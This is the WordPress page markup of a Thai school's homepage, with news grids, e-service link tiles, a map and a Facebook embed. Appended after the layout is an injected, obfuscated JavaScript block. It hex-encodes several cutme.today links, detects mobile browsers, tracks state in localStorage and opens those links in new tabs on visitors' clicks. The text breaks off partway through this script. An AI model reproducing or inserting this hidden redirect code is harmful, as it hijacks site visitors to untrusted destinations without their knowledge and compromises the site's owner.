{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 